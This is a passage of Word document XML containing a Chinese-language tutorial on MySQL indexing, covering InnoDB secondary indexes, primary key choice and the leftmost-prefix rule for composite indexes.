        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="003529B6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第二个与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引的不同是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>辅助索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域存储相应记录主键的值而不是地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。换句话说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的所有辅助索引都引用主键作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域。例如，下图为定义在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Col3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上的一个辅助索引：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5172075" cy="2114550"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="图片 6" descr="http://up.2cto.com/2012/1130/201211301113004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up.2cto.com/2012/1130/20121130111300494.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172075" cy="2114550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里以英文字符的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>码作为比较准则。聚集索引这种实现方式使得按主键的搜索十分高效，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>辅助索引搜索需要检索两遍索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：首先检索辅助索引获得主键，然后用主键到主索引中检索获得记录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00D20C9B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了解不同存储引擎的索引实现方式对于正确使用和优化索引都非常有帮助，例如知道了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引实现后，就很容易</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明白为什么不建议使用过长的字段作为主键，因为所有辅助索引都引用主索引，过长的主索引会令辅助索引变得过大。再例如，用非单调的字段作为主键在</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中不是个好主意，因为</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据文件本身是一颗</w:t>
      </w:r>
      <w:r w:rsidR="002F217F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ee</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，非单调的主</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>键会造成在插入新记录时数据文件为了维持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的特性而频繁的分裂调整，十分低效，而使用自增字段作为主键则是一个很好的选择。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A489C" w:rsidRPr="00F41A4C" w:rsidRDefault="008A489C" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009313D8" w:rsidRPr="00F41A4C" w:rsidRDefault="009313D8" w:rsidP="009313D8">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1.3  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>联合索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7425" w:rsidRPr="00F41A4C" w:rsidRDefault="004C780E" w:rsidP="00703730">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>联合索引又叫复合索引。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>两个或更多个列上的索引被称作复合索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00975223" w:rsidRPr="00F41A4C" w:rsidRDefault="004B60C0" w:rsidP="00957241">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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对于复合索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:Mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从左到右的使用索引中的字段，一个查询可以只使用索引中的一部份，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00975223" w:rsidRPr="00F41A4C" w:rsidRDefault="004B60C0" w:rsidP="00957241">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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但只能是最左侧部分。例如索引是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">key index (a,b,c). </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a | a,b| a,b,c 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>种组合进</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957241" w:rsidRPr="00F41A4C" w:rsidRDefault="004B60C0" w:rsidP="00957241">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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行查找，但不支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> b,c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当最左侧字段是常量引用时，索引就十分有效。两个或更多个列上的索引被称作复合索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B60C0" w:rsidRPr="00F41A4C" w:rsidRDefault="004B60C0" w:rsidP="00957241">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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利用索引中的附加列，您可以缩小搜索的范围，但使用一个具有两列的索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不同于使用两个单独的索引。复合索引的结构与电话簿类似，人名由姓和名构成，电话簿首先按姓氏对进行排序，然后按名字对有相同姓氏的人进行排序。如果您知</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>道姓，电话簿将非常有用；如果您知道姓和名，电话簿则更为有用，但如果您只知道名不姓，电话簿将没有用处。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以说创建复合索引时，应该仔细考虑列的顺序。对索引中的所有列执行搜索或仅对前几列</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行搜索时，复合索引非常有用；仅对后面的任意列执行搜索时，复合索引则没有用处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC02AC" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02AC" w:rsidP="002E4165">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一个顶三个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。建了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(a,b,c)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的复合索引，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么实际等于建了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(a),(a,b),(a,b,c)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三个索引，因为每多一个索引，都会增加写操作的开销和磁盘空间的开销。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于大量数据的表，这可是不小的开销！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC02AC" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02AC" w:rsidP="002E4165">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
